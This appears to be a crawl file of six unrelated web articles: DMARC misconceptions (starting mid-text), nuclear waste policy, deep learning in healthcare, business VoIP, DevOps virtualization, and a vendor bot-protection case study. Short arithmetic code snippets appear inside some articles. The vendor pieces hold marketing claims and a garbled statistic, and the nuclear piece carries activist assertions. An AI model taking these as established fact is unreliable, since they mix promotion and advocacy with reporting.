By now, it must be clear what is a DMARC policy, what DMARC stands for, and how DMARC works. Organizations can mitigate spoofing and phishing attacks, block malware, and increase email deliverability using DMARC records. However, while it is a powerful tool, DMARC has caused certain misunderstandings. Below is an examination of a few of the most common misconceptions and their clarification.
Misunderstanding 1: DMARC is a quick-fix solution.
Contrary to what many people believe, DMARC does not guarantee the complete security of your email channel. It certainly improves email deliverability, but email servers can formulate their local policies and allow them to override DMARC policies. However, internet service providers adopting DMARC policies are more likely to ensure that your emails land in the receiver’s primary inbox. Thus, even when DMARC provides many benefits, placing and enforcing a DMARC record is not a quick-fix solution for email deliverability.
Misunderstanding 2: Immediately enforcing a ‘p=reject’ policy is the right solution.
Generally, organizations follow a knee-jerk reaction on encountering a phishing attack on their behalf. They lock down their email channel by placing a DMARC record and immediately enforcing a 100% ‘p=reject’ policy. While it seems to be an effective way to block phishing attacks instantly, it has its downsides. Some of your legitimate emails can also get lost under such circumstances.
DMARC analyzing service providers have noted that organizations never have a 100% compliance rate in most cases when they start with DMARC. Therefore, the consensus is that organizations should initially begin with a ‘p=none’ policy and monitor each email through the reports submitted by DMARC services. It helps improve SPF and DKIM authentication. This process can take one month to a year, depending on the organizational email environment.
Subsequently, the organization can move to a ‘p=reject’ policy. Applying the ‘p=quarantine’ policy first is even better if you are patient enough to wait some more time before enforcing ‘reject.’ In that case, messages marked as failed will not be rejected outright; they are moved to the spam folder, where you can still verify them and release any that were falsely marked as failed. Immediately enforcing the ‘p=reject’ policy is not a sound decision.
Misunderstanding 3: DMARC protects all inbound email streams.
DMARC primarily works on the outbound email channel, so it does not protect all inbound mail. That said, the effect can spill over, with DMARC influencing a small part of the inbound email channel. For example, emails sent to colleagues are affected by DMARC: they are outbound for the sending server but inbound for the network, so DMARC does influence them.
Benefits of an Effective DMARC Policy
Having an effective DMARC policy setup is beneficial to organizations in many ways, as listed below.
- It helps mitigate email-based cyber threats and gives a complete insight into the email channels. In addition, an effective DMARC policy provides strong protection and disallows malicious actors’ unauthorized use of your email domain.
- It provides organizations with enhanced visibility of who and what is using your email domain to send emails across the internet.
- It improves email deliverability and, thus, enhances organizational reputation.
- It establishes a consistent, authenticated identity across a massively growing footprint of DMARC-capable receivers.
- By uplifting the organization’s reputation, it provides the customer with an enhanced user experience.
Traits to Look Out For in a DMARC Analyzing Software Solution
ISPs and domain service providers should have an effective DMARC policy to prevent spam directed at your customers and cyberattacks that originate through spoofed emails and phishing websites. Here are the traits one should look for in a DMARC analyzing software solution.
- The platform should be user-friendly and guide you toward a ‘p=reject’ policy as quickly as possible without bypassing or ignoring any email authentication standard.
- It should provide an effective SaaS solution that empowers organizations to manage complex DMARC deployment comfortably.
- The solution should provide 360-degree visibility and governance across all email channels.
- The entire DMARC implementation and usage procedure should be as easy as possible.
The internet has become an integral part of human life, and email correspondence has increased manifold. While convenient, email gives malicious actors an opening to spoof messages aimed at unsuspecting targets, with the intent of infiltrating information systems and causing reputational and financial loss to the organization. Email channels are among the most vulnerable parts of any network system.
Therefore, organizations and domain service providers should ensure protection from phishing attacks to reduce cybercrime incidents significantly. Email authentication protocols like SPF, DKIM, and DMARC can prove handy in such circumstances. The detailed information on DMARC provided in this article will help organizations deploy the solution quickly and combat email-based cyber threats.
No issue surrounding nuclear power is more polarizing than nuclear waste and what to do with it.
The United States has 103 nuclear power reactors at 65 plants in 31 states. Thousands of tons of radioactive commercial spent fuel are permanently stored at these reactor sites, the U.S. Government Accountability Office reports — about 74 percent of it in pools of water, with the remainder in dry storage casks.
Part One of this three-part series described a new generation of small modular reactor designs; Part Two examined the economics. The questions now are, can existing nuclear waste be managed safely — and do new, smaller reactors offer any hope in this regard?
‘Indefinitely and Safely’
The solution to the waste generated by nuclear power plants is ultimately a government policy decision, Greg Ashley, president of Bechtel‘s nuclear business line, told TechNewsWorld.
“Other countries have demonstrated that the entire nuclear fuel cycle can be safely and economically managed,” Ashley explained. “We are optimistic that the U.S. will also enact policy and regulation that supports management of the nuclear fuel cycle.”
NuScale Power, which was established solely for the deployment and commercialization of Small Modular Reactor technology, does not address the issue of used nuclear fuel, said Mike McGough, the company’s chief commercial officer.
“Like the other proposed SMR designs and all other operating nuclear power plants, we will generate a very small quantity of used nuclear fuel, which can be stored indefinitely and safely at the plant site, as is done today, until such time that recycling is permitted or a permanent repository is established,” McGough told TechNewsWorld.
‘Nuclear Power Has Failed Humanity’
Others aren’t so sure — particularly about the “safety” part.
“Small Modular Reactor designs will still create tons and tons of radioactive waste for which there is no solution, and never will be,” asserted Ace Hoffman, an anti-nuclear power plant activist and author of The Code Killers: Why DNA and ionizing radiation are a dangerous mix.
“There are several thousand dry casks scattered around the country, just waiting to be breached,” Hoffman told TechNewsWorld. “There are over one hundred spent fuel pools. One percent of this problem would still be a huge problem.
“Nuclear power has failed humanity and continues to do so,” Hoffman added. “There is no such thing as clean nuclear power and never will be. It is physically impossible to make this process safe and clean.”
Unstable Uranium Isotopes
The Earth’s store of the element uranium was produced in one or more supernova explosions in the Milky Way galaxy more than 6 billion years ago.
In 1789, the element was identified and named by German chemist Martin Klaproth. The term “uranium” was derived from the name Uranus, the sun’s seventh planet.
Uranium, the heaviest naturally occurring element on earth, is also the planet’s deadliest metal. Radioactive uranium wastes consist of particles that, if they escape into the environment and enter the human body, can destroy cells and cause birth defects and cancers.
To wit: “Spent nuclear fuel, the used fuel removed from nuclear reactors, is one of the most hazardous substances created by humans,” notes a GAO report from last year.
Given that the United States has no permanent disposal site for the nearly 80,000 tons of spent fuel from U.S. reactors, according to the GAO, that’s a scary problem.
All that deadly waste was intended to go to Yucca Mountain, a volcanic range in Nevada, northwest of Las Vegas.
Until federal funding ended in 2010, the Yucca Mountain Nuclear Waste Repository was to be a deep geological repository storage facility for spent nuclear reactor fuel and other high level radioactive waste.
Unfortunately — or fortunately, depending on your perspective — Yucca Mountain sits on an aquifer and in an earthquake zone, so it has been deemed too dangerous a place to store radioactive waste.
In examining other centralized storage or permanent disposal options, the GAO found that new facilities may take from 15 to 40 years before they are ready to begin accepting spent fuel. This situation will likely more than double the amount of spent fuel stored at nuclear power plants to more than 150,000 tons before it can be moved offsite.
In the meantime, spent nuclear fuel remains onsite at the nuclear power plants where it is generated, collectively accumulating at commercial nuclear reactors an additional 2,200 tons per year.
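The GAO's projection is straightforward arithmetic; a quick sketch using the figures cited above (the 32-year wait is an assumed midpoint of the GAO's 15-to-40-year range, chosen here for illustration):

```python
# Rough projection of on-site spent fuel, using the figures cited above.
current_tons = 80_000        # spent fuel already stored at reactor sites
added_per_year = 2_200       # new spent fuel generated annually
years_to_new_facility = 32   # assumed midpoint of the 15-40 year estimate

projected = current_tons + added_per_year * years_to_new_facility
print(f"Projected on-site inventory: {projected:,} tons")  # 150,400 tons
```

At the upper end of the range (40 years), the inventory tops 168,000 tons, consistent with the GAO's "more than 150,000 tons" figure.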
Even if an alternative to Yucca Mountain were ever opened, though, it would be highly unlikely that deadly radioactive waste would ever be removed from the nuclear power plant sites.
After all, the spent fuel can’t be moved by truck or train — “Mobile Chernobyls” headed down “Fukushima Freeways” — without risking accidents that would permanently destroy huge areas. Since it would require decades of 24/7/365 transport to move the stuff, the odds in favor of even a single devastating accident are very high.
‘Pre-Deployed Nuclear Weapons’
Eventually, all nuclear power plants’ spent fuel rods will be moved over from cooling pools into the dry casks, where they will sit forever. Every 80 or 100 years or so, someone will have to somehow take the highly radioactive, dried-out reactor cores and transfer them to new dry casks.
“Nuclear reactors and the waste stored on the site are effectively pre-deployed nuclear weapons in the event that malicious people decide to blow one up,” notes the Nuclear Information and Resource Service in the No. 1 spot on its “Top 11 Reasons to Oppose Nuclear Power” list.
“Building more reactors simply increases the number of targets, or if added to an existing site, makes that target bigger,” the list explains. “Chernobyl is an example of a reactor being blown up. Until Fukushima, it was the largest single release of radioactivity to date, exceeding all nuclear weapons tests (combined).”
Besides cooling, casking or burying the stuff, the nuclear energy industry thinks it has a possible remedy for dealing with spent fuel: nuclear waste-burning reactors that supposedly could extract large quantities of energy from nuclear waste while eliminating it in the process.
An option for nuclear waste disposal includes converting the plutonium into mixed-oxide fuel, also known as “MOX” — a plutonium-uranium blend for use in conventional nuclear reactors.
Critics, however, worry about the risk of nuclear proliferation that could result from encouraging increased separation of plutonium from spent fuel in the civil nuclear fuel cycle.
GE-Hitachi’s PRISM reactor, on the other hand, offers a different alternative.
Specifically, its PRISM fast reactor uses a completely different design — fueled by plutonium and cooled by liquid sodium — that offers a viable solution, the company says.
Based on a sodium-cooled technology that generates more fissile material than it consumes, PRISM is also part of GE-Hitachi’s Advanced Recycling Center proposition to the U.S. Congress to deal with nuclear waste.
PRISM is a so-called “fast reactor”: it uses liquid sodium, rather than water, to cool the reactor, which allows the neutrons to maintain higher energies and to cause fission in elements such as plutonium more efficiently than water-cooled reactors do.
PRISM incorporates “passive safety” features and, if necessary, can shut down automatically. PRISM would not require any automatic systems, valves or operators to remove reactor heat after a shutdown involving a complete loss of electrical power.
The PRISM reactor purportedly disposes of a great majority of the plutonium itself, as opposed to simply reusing it over again without ever actually ridding the planet of the substance.
Hoffman, not surprisingly, isn’t convinced.
“MOX fuel has been tried and abandoned lots of times,” he said. “That GE-Hitachi ‘fast’ reactor will be beset with problems, including generating more radioactive trash, because that’s what you get when you split atoms for energy.”
Lethal to the Human Soft Machine
Why is spent fuel so dangerous?
Certain changes take place in the ceramic uranium fuel pellets during their time in a nuclear power plant’s reactor. The fission fragments left over after an atom has split are radioactive.
During the life of the fuel, these radioactive particles collect within the fuel pellets. The fuel remains in the reactor until trapped fission fragments begin to reduce the efficiency of the chain reaction.
Some of the fission products include various isotopes of strontium, cesium and iodine. The spent fuel also contains plutonium and uranium that was not used up. The fission products and the leftover plutonium and uranium remain within the spent fuel when it is removed from the reactor.
This material is called “high level waste” because it is extremely hot, very radioactive and very deadly.
‘Radiation Damages Our DNA’
Radioactive elements can contaminate the body’s cells either environmentally via gamma radiation or through inhalation and ingestion. It affects the chromosomes within tissue cells, but the injury to the body is caused primarily by interfering with cell biology and breaking apart molecules.
By far, the most vulnerable tissues are bone marrow and the lymph nodes. The body has very efficient mechanisms for capturing iodine and concentrating it in the thyroid gland, for directing calcium and other bone-seeking elements to the skeleton and holding them there, and for concentrating other elements at specific points.
Consequently, the full destructive force of a radioactive material may focus on a single organ.
Iodine-131 poses a special health risk because of its cancer-causing effect on the thyroid gland. Strontium-90 is a “bone seeker” that exhibits biochemical behavior similar to calcium. Cesium-137, on the other hand, mimics potassium and is absorbed through the walls of the intestine into the bloodstream or lymphatic system.
“Radiation damages our DNA and leads to cancer and many other ailments,” explained Hoffman.
“Banning the bomb isn’t enough — and we haven’t even done that yet,” he concluded. “We need to ban the reactors, too. None of their safety designs are of much use against any truly destructive forces that might come along, be it terrorists, rust, human error, asteroid impacts, solar storms, war or Mother Nature.” | <urn:uuid:c27041be-82d7-4748-a4c5-0826555ba82b> | CC-MAIN-2022-40 | https://www.crmbuyer.com/story/nuclear-power-part-3-radioactive-waste-78324.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00495.warc.gz | en | 0.931703 | 2,273 | 3.0625 | 3 |
While some sectors of the tech-driven economy thrive on rapid adoption of new innovations, other areas stay rooted in traditional approaches due to regulatory and other constraints. Despite great advances toward precision medicine goals, the healthcare industry, like other important segments of the economy, is bound by specific constraints that make it slower to adopt potentially higher-performing tools and techniques.
Although deep learning is nothing new, its application set is expanding. There is promise for the more mature variants of traditional deep learning (convolutional and recurrent neural networks are the prime example) to morph into domain-specific tools to bolster healthcare capabilities in new ways. Of course, this is not without a set of challenges, which we will get to in a moment.
Over the last year, deep learning has moved beyond its anchors in video, image, and speech recognition and analysis for commercially geared applications into an increasing array of scientific fields. In healthcare, deep learning is expected to extend its roots into medical imaging, sensor-driven analysis, translational bioinformatics, public health policy development, and beyond.
A group of researchers analyzing the state of deep learning in health informatics noted that “rapid improvements in computational power, fast data storage, and parallelization have contributed to the rapid uptake of deep learning in addition to its predictive power and ability to generate automatically optimized high-level features and semantic interpretation from the input data.” In addition to tracking the significant jump in the number of peer-reviewed publications about the use of deep learning in healthcare, they also tracked the evolution of deep learning approaches.
“In domains such as health informatics, the generation of this automatic feature set without human intervention has many advantages. For instance, in medical imaging, it can generate features that are more sophisticated and difficult to elaborate in descriptive means. Implicit features could determine fibroids and polyps, and characterize irregularities in tissue morphology such as tumors.”
Further, they note that “in translational bioinformatics, such features may also determine nucleotide sequences that could bind DNA or RNA strands to a protein.” Other areas, extending as far as public health monitoring, can leverage deep learning to capture data for macro trends based on regions and populations, for example.
While there are promises of a bright future for deep learning in health informatics, there are certainly challenges, and a healthy degree of skepticism is warranted about how fully, and when, deep learning will fit this wide-ranging area.
“Despite some recent work on visualizing high level features by using weight features in a convolutional neural network, the entire deep learning model is often not interpretable,” the researchers note. “Consequently, most researchers use these approaches as a black box without the possibility to explain why it provides good results, or without the ability to apply modifications in the case of misclassification issues.” This black box problem is compounded by the fact that neural networks can be tricked (although not necessarily on purpose).
“Patient and clinical data is costly to obtain and healthy control individuals represent a large fraction of a standard health dataset. Deep learning algorithms have mostly been employed in applications where the datasets were balanced, or, as a work-around, in which synthetic data was added to achieve equity. The latter solution entails a further issue as regards the reliance of the fabricated samples.”
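One common work-around for such imbalance, short of fabricating synthetic samples, is to reweight the training loss by inverse class frequency so the rare (diseased) class is not drowned out by healthy controls. A minimal sketch, with invented labels for illustration:

```python
from collections import Counter

# Hypothetical labels for a health dataset dominated by healthy controls:
# 0 = healthy control, 1 = diagnosed case.
labels = [0] * 90 + [1] * 10

counts = Counter(labels)
n, k = len(labels), len(counts)

# Inverse-frequency weights: rare classes get proportionally larger weight,
# so a model's loss is not dominated by the majority (healthy) class.
weights = {cls: n / (k * count) for cls, count in counts.items()}
print(weights)  # class 1 (rare) gets weight 5.0; class 0 roughly 0.56
```

These weights would typically be passed to a training loss or sampler; the reweighting itself is model-agnostic.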
As the team explains via an example, “it is possible to add small changes to the input sample (such as imperceptible noise in an image) to cause samples to be misclassified” but of course, any machine learning approach can suffer the same problems. On the flip side, it is also possible to “obtain meaningless synthetic samples that are strongly classified into classes even though they should not have been classified. This is also a genuine limitation of the deep learning paradigm, but it is also a drawback for other machine learning algorithms as well.”
“Deep learning predominantly requires large amounts of training data. Such a requirement makes the classical barriers to entry associated with machine learning (data availability, privacy) more critical.”
Training neural networks of any type requires a great deal of data, and that is just to allow them to recognize known features. “Not all applications, particularly rare diseases or events, are well-suited to deep learning,” the researchers note, explaining that the problem of “overfitting” (which leads to an inability for the neural net to make suitable generalizations) is still a problem.
The problems cited for deep learning in healthcare are similar in other areas, particularly in terms of the black-box problem, overfitting, and reliability. However, this review does provide in-depth insight into which areas might benefit from implementing machine learning, even if some maturation of the space is still required.
VoIP, also known as Internet telephony or ‘voice over IP’, is a way of making phone calls without using a traditional analogue phone line. It stands for ‘Voice over Internet Protocol’ and, as the name suggests, it is a system for making phone calls over the Internet rather than over a landline or mobile network. It works by converting voice signals into digital data and sending that data over your broadband line – essentially the same concept as speaking to someone in another location, but via the Internet. So if it’s such a similar idea, just why is VoIP becoming such a big player for businesses across the world?
There are many benefits of using VoIP. It’s cheaper than normal phone lines once it has been set up, and could even mean that you pay nothing at all when you make a phone call – though this depends on the distance and which country you're calling. In some cases, you can spend hours on a telephone conference for free!
VoIP does more than increase savings by lowering costs though. Here’s why so many businesses are ditching their analogue lines in favour of VoIP:
Access via a smartphone
No longer is it a requirement to be in the office to connect to your phone system. You can receive calls to your business or DDI on your smartphone. You can access the office directory and make and receive calls as if you were in the office via the VoIP system app installed on your mobile.
You can access VoIP via a smartphone in one of two ways. Firstly, you can use an app that allows you to make calls, such as Skype, FaceTime, WhatsApp, Facebook Messenger and many more. This is one of the easiest ways to use VoIP: if the person you are calling has the app and access to the Internet, then it’s free and easy to use.
You can also use VoIP on your smartphone from your landline provider. You can make calls that use the minutes from your plan, which is a benefit if you have certain deals such as cheap international calling. Landline providers such as BT and TalkTalk both have popular services.
Improve and upgrade functionality
For as little as £3 per month per user you could replace your existing business phone system with a new VoIP system. The features of a VoIP system give you voicemail, call waiting and hunt groups, all easily managed via an online portal such as Broadcloud.
Access on your computer
Make and receive voice and video calls as if you were in the office from your laptop, iPad, tablet or home PC. A VoIP system exists wherever you work and gives you all of the functions you may need remotely. It is easy to send and receive faxes too. Calls to a landline or mobile will be routed through your office minutes contract.
Your number follows you wherever you go
Now you can get your calls routed to your desk, your mobile or the office you choose to work from, wherever that may be. Calls are intelligently sent to your available location, so you don’t miss any important calls or return to the office to a ton of voicemails.
Integrate other office systems with your VoIP system
CRM, desktop support and email all link into your VoIP system, making it much easier to access contacts and respond to the important issues you face during the working day.
So what will you need to make VoIP work for you? It depends on the method of VoIP you’re going to use. Firstly, you will need a broadband connection; a fibre optic one is best, as it is more reliable. You’ll ideally want an unlimited plan so you have the freedom to talk for as long as you want. To get the best VoIP experience you will need a full FTTP or an Ethernet connection, which are available from some business broadband providers. Search for a business broadband VoIP connection here.
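How much broadband a VoIP deployment actually needs depends on the codec in use. As a rough sketch, assuming the common G.711 codec (64 kbps of voice payload, roughly 87 kbps per call per direction once packet overhead is added; both the per-call figure and the link speeds below are illustrative assumptions, not measurements):

```python
# Rough estimate of how many concurrent G.711 VoIP calls a line can carry.
KBPS_PER_CALL = 87.2   # assumed: 64 kbps payload + RTP/UDP/IP/Ethernet overhead
HEADROOM = 0.75        # leave 25% of the link free for other traffic

def max_concurrent_calls(uplink_mbps: float) -> int:
    usable_kbps = uplink_mbps * 1000 * HEADROOM
    return int(usable_kbps // KBPS_PER_CALL)

for uplink in (2, 10, 50):  # Mbps, illustrative line speeds
    print(f"{uplink} Mbps uplink -> ~{max_concurrent_calls(uplink)} calls")
```

Compressed codecs such as G.729 use far less bandwidth per call, which is why the codec choice, not just the line speed, determines capacity.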
If you want to use a VoIP system you will need to purchase the licenses from a VoIP provider and, if you don’t already have one, a compatible phone. If the phone plugs into an Ethernet network then make sure that your router is compatible too.
To use VoIP with your computer it's probably a good start to have a laptop or desktop computer that is able to connect to the Internet. You will also need a working set of headphones or speakers and a microphone. You may consider getting a headset for the highest quality, but it’s not essential – as long as they can hear you, you’ll be off to a good start. For most providers you will have no option but to keep your landline, as you will need line rental to receive broadband.
VoIP is taking the business world by storm due to the financial savings it can deliver against the costs of normal landlines, the higher-quality calls that can be made, and the consistency of the service even when lots of other people in the office are also on the phone. A slow Internet connection will mean low-quality calls, but business Internet is generally improving, and if you have fibre optic, you will be fine. In some cases, you will be able to keep your phone number; it depends on whether the provider can port it over. In some cases, you won’t even need a number. The cost also depends on your setup: app-to-app calling is mostly free, while services provided by a business come with a monthly cost.
If businesses keep taking up VoIP plans at such a rapid rate, it’s likely analogue phone lines could soon be a thing of the past. If your business has not yet begun making the switch to VoIP, now is the time to upgrade and make sure you and your business doesn’t get left behind.
Nathan Hill-Haimes, founder, Amvia
Image Credit: Everything Possible / Shutterstock | <urn:uuid:bdade7ef-0db4-4ba5-8a57-2dccc24171f5> | CC-MAIN-2022-40 | https://www.itproportal.com/features/why-voip-has-become-such-a-major-player-for-businesses/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337339.70/warc/CC-MAIN-20221002181356-20221002211356-00495.warc.gz | en | 0.961008 | 1,238 | 2.71875 | 3 |
The primary pursuit of DevOps structuring and systems is to improve the speed and quality of the software development process. DevOps looks to achieve the simultaneous increase in both quality and rate of deployments by emphasizing the importance of collaboration and promoting transparency through the use of tools that empower communication and data transparency. DevOps teams are made of cross-discipline members that bring their unique skill sets and diverse perspectives to bear to increase the team’s ability to tackle their projects quickly and efficiently.
Aside from an emphasis on communication and teamwork, DevOps also looks for technologies that power up the software development life cycle (SDLC). Tools like the cloud and automation are leveraged to their fullest extent to provide DevOps teams with every possible advantage in delivering on the continuous integration and continuous delivery (CI/CD) goals of the enterprise. Any piece of tech that alleviates pressure on the team and optimizes the hours spent on each task is a valuable asset for the organization to employ.
Another such tool that helps to ensure rapid and stable deployments occur on a regular basis is virtualization.
(This article is part of our DevOps Guide. Use the right-hand menu to navigate.)
Basics of Virtualization
Virtualization is the process of creating software that mimics various hardware and software environments without changing the physical hardware itself. Virtualization techniques create abstractions of physical hardware components, forming aggregated pools of resources made up of CPUs, memory, storage, networking, and applications, among other components. Essentially, a virtual machine (VM) functions as a simulation of a specific IT hardware and software configuration without requiring the physical components to be swapped out. This allows a single piece of hardware to host numerous VM configurations simultaneously. Virtualization is not a new concept; in fact, the use of virtualization techniques dates back to as early as the late 1960s.
Virtualization has come a long way since its first inception, but the core concept remains the same – achieve more computing capabilities with fewer resources and running multiple, independent systems simultaneously on a single machine. Today’s VMs are much more complex and capable of quickly scaling up or down to meet resource requirements on demand thanks, in part, to leveraging cloud technology in addition to virtual machine techniques. The power of modern VMs allows engineers to create environments that are virtually identical to real-world hardware configurations with software running within the VM environment.
This is especially important in today’s world where computers have become incredibly complex and diverse thanks to the proliferation of various operating systems, hardware manufacturers, and the vast array of mobile devices that see regular use across the globe. As computers have continued to increase in capabilities, complexity, and diversity, creating software that runs on these various devices also grows in complexity. These factors have created a situation in which creating and testing software for the various devices that software will eventually be utilized on is a daunting if not impossible task without leveraging the power of virtualization.
Different Types of Virtualization
There are three primary types of virtualization: server virtualization, network virtualization, and desktop virtualization.
Server virtualization enables a single physical server to run multiple operating systems at once. This creates a more efficient server providing reduced operating costs, increased performance, and faster workload capacity all while reducing physical server complexity.
Network virtualization reproduces physical networks in a virtual environment which allows applications to run on the simulated network in the same way they would on a physical one. Virtual networks provide enhanced operational benefits compared to their physical counterparts and do so at reduced costs.
Desktop virtualization mimics the environment and settings of an instance of a desktop and the applications hosted on the device. This allows users to access enterprise resources from off-site or even from devices that would otherwise be incapable of running the hosted services. This technology allows users to leverage the processing power of more advanced machines from standard or even mobile devices – providing them with the capabilities they need to get their work done on the go.
The applications for the various forms of virtualization are numerous, but the primary benefit they all provide is the ability to access and leverage resources that would otherwise be prohibitively expensive, if not altogether impossible. Virtualization is a powerful tool with various applications for enterprises of all sizes, but it has specific uses for organizations that utilize DevOps systems.
How Virtualization and DevOps Work Together
As was mentioned above, DevOps seeks to optimize the development, testing, and deployment processes of software development through the use of collaboration and cutting-edge technologies. Virtualization enables DevOps teams to develop and test within simulated environments that run the full gamut of devices available to consumers while also testing deployment on virtual live environments. This enables development to occur alongside real-time testing of how the changes will impact the entire system. This level of accuracy in testing makes for vastly reduced deployment times and increased stability.
Containerization, another popular technology DevOps teams are adding to their toolkits, essentially takes virtualization one step further: containers share the host operating system (OS) kernel, allowing multiple applications to run in isolation on a single machine, each within its own container. Containerization extends the concept of virtualization by providing not only a digital configuration that mimics a hardware setup but also the OS and libraries that make up the entire runtime environment.
Doing this allows DevOps teams to build, test, and deploy their software solutions within live simulated environments while using vastly reduced computing resources. This results in DevOps teams being able to achieve more with less. Continuous deployment is achievable through the flexibility of virtualization and containerization technologies, which allow updates to be tested and deployed on multiple servers with enhanced stability and consistency. Virtualization and containerization both play large roles in maximizing enterprise resources to ensure development resources are optimally leveraged at each stage of the DevOps process.
DevOps: Solutions for You
If DevOps sounds like a good fit for your organization’s needs but you want to make sure you get it right the first time or you’re struggling with your current DevOps implementation, BMC is the IT solution partner you need. Read more about how automation and DevOps systems can help increase the rate at which you deploy products with BMC’s free eBook: Automate Cloud and DevOps Initiatives. Read about how to make the most of your cloud and enterprise resource investments in the eBook: Five Steps for Successfully Managing Cloud Costs.
BMC expert consultants are available to work with you to bring their knowledge and expertise to your organization. BMC provides custom-tailored Deployment Services for your organization to tackle the unique challenges you face. When partnering with BMC, you get:
- Faster service delivery: Agile releases that keep up with rapid demand
- Visibility across data: Ensure compliance and data accuracy
- Cost-effective service: Increased productivity and performance
- Experienced DevOps professionals: Equip you with the tools you need for success
- Conversion or upgrade: Seamless modernization or total replacement
- All tailored for the specific needs of your organization.
Download or view the Solution Implementation Overview online to learn more about how BMC Consulting Services can help you. Check out The Power of Shifting Left to learn more about amping up your CI/CD pipeline by modernizing your workload orchestration. Then contact the experts at BMC to find out more about how to leverage DevOps and virtualization for enhanced building, testing, and deployment success. | <urn:uuid:c865c996-8ec5-4cb6-a922-ba7f6943be53> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/devops-virtualization/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00495.warc.gz | en | 0.925223 | 1,523 | 3.15625 | 3 |
Finder estimates that there are roughly 2.19 billion online banking users worldwide in 2022, which accounts for nearly half of all worldwide internet users. As astonishing as this figure might be, it does not represent the traffic of real users, as it includes traffic from malicious bots. Hackers deploy bots as part of email phishing attacks, account takeover (ATO) attacks, scalping attacks, and content scrapings from financial services websites.
Wherever There is Money, There are Bots Trying to Get It
Malicious bots mimic human behavior on the internet to steal sensitive information. Bot attacks initiated by cyber fraudsters result in data breaches, damage to a business’ reputation, interruption of business operations, and customer dissatisfaction. It also results in a number of multi-dimensional security threats such as:
Data Security Threats
Hackers use bots to steal batches of sensitive information about financial products, currencies, transactions, marketing, investments, and research, and then sell this information on the dark web for nefarious purposes.
Account Security Threats
Hackers launch account takeover fraud to gain access to bank accounts. They also initiate smishing attacks to dupe consumers into providing personal information, and use spam-registration attacks to disrupt online banking sites.
Scalping as a Fraud
Hackers conduct rapid-fire, automated purchases of popular ticket items as soon as they become available, and then sell them at grossly inflated prices.
Credit Card and Loan Fraud
Hackers use fake identification to apply for large numbers of credit cards to obtain illegal loans from banks.
Phishing Websites Threats
Based on scraping data collected from official bank websites, phishing websites with similar domains or URLs are used to steal personal information and commit fraudulent activities.
Website Evasion Threats
Hackers set up bots to scan the source code of a web page and the web elements of financial platforms, and then search for potential server vulnerabilities to penetrate further into an organization.
Bot attacks disrupt normal business traffic at a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.
Bots are programmed to mimic human behavior while interacting with a website or app, and continue to evolve with each daily scraping. This makes malicious bot attacks hard to identify if you simply implement basic bot solutions. The key to combatting bots is being able to differentiate malicious bot traffic from that of real users.
Making Sense of AI algorithms
Because bot attacks are constantly changing and mutating, with the number of malicious bot attacks doubling over the last three consecutive years (ref: CDNetworks State of Web Security 2021), a sustainable and effective bot management solution is required that has smart defense mechanisms to counter ever-changing attacks.
Artificial Intelligence (AI) has proven to be an effective tool in fighting bot attacks. The CDNetworks’ security platform has exposed AI algorithms to massive (terabyte-scale) attacks on a daily basis. By analyzing machine learning models dynamically, CDNetworks found AI effective in differentiating between legitimate human activity and malicious bots.
CDNetworks’ Bot Shield Solution provides unprecedented bot-fighting AI capabilities. Integrated Watson Machine Learning (WML) algorithms empower Bot Shield with defensive strategies such as multi-dimensional access controls, CAPTCHA challenges, and human-interaction verification to identify and block malicious bots in real time. Best of all, machine learning is updated to address the altering nature of bot attacks.
We are lucky enough to have Bot Shield to block the malicious bots, as it benefits us in revenue, costs and the reputation as well.
An Anonymous Fund Administrator
3 Key Phases to Achieve an Overwhelming Victory
The following example describes how Bot Shield is protecting a publicly funded management company that was taking charge of hundreds of funds. The company’s online services came under bot attack nearly as soon as the services became available.
Bots scraped announcements published on the company websites or in apps and attempted to use malicious traffic to slow or bring down the websites. Worse, the scraping contents were often used for fraudulent purposes. The fund management company explored traditional methods to stop the bot attacks using tools that focused on the granularity of IP, but quickly learned that this approach blocked legitimate users while allowing the malicious bots to rapidly adapt to the IP-based solutions and continue crawling the company’s site. Traditional solutions also have limited effects on low-frequency attacks. Consequently, the fund management company demanded a more dynamic and smarter solution to shield its financial services.
CDNetworks then provided the ideal bot management solution Bot Shield for the fund management company, by using AI to successfully identify and block rogue bots throughout following 3 phases.
Phase 1: Observation and Analysis
Phase 2: Blocked by AI
Using the leading Threat Intelligence Library and fingerprinting capabilities, CDNetworks’ AI algorithms monitored the workflow of key requests directed at the fund management company’s websites. From this monitoring, abnormal behavior models were generated along with access-control strategies for further detections.
A Normal Visiting Workflow
A Suspicious Visiting Workflow
Using the abnormal behavior models, AI identified and blocked all malicious bots accurately, offloading malevolent traffic from the origin and accelerating data transmissions. At the same time, legitimate users were no longer mistakenly blocked from accessing the websites and now enjoy a superior experience while visiting the fund management company’s online platform.
Phase 3: Continuous Protection
To be frank, the battle with malicious bots will never be won. Determined hackers will always find ways to upgrade attack strategies, schemes, and methods. As hackers intensify their fight, the CDNetworks’ AI algorithm will be there, studying the latest analytical models of bot attacks and continuing to build a comprehensive security umbrella to safeguard sensitive and critical information. For the fund management company, the algorithm is blocking over 1 million bot attacks each day.
Increasingly Menacing Security Threats
According to CDNetworks’ State of the Web Security 2021, the CDNetworks’ security platform monitored and blocked 847.71 billion bot attacks. This number well surpassed the previous record of 236% in 2020, posing an increasingly menacing security threat to organizations regardless of industry, shape, or size.
With over 2,800 global points of presence, the CDNetworks platforms carry enormous amounts of Internet traffic and process terabyte-scale log data daily, including massive samples of attack and defense data. CDNetworks’ Bot Shield solution makes use of these worldwide networks and resources and, combined with AI machine learning, protect enterprise businesses. With updated and multi-leveling defense rules, CDNetworks’ Bot Shield boasts a successful track record of blocking different types of bots accurately and effectively. CDNetworks has protected data for organizations covering a myriad of industries, including Finance and E-Commerce, real estate, transportation, and Gaming.
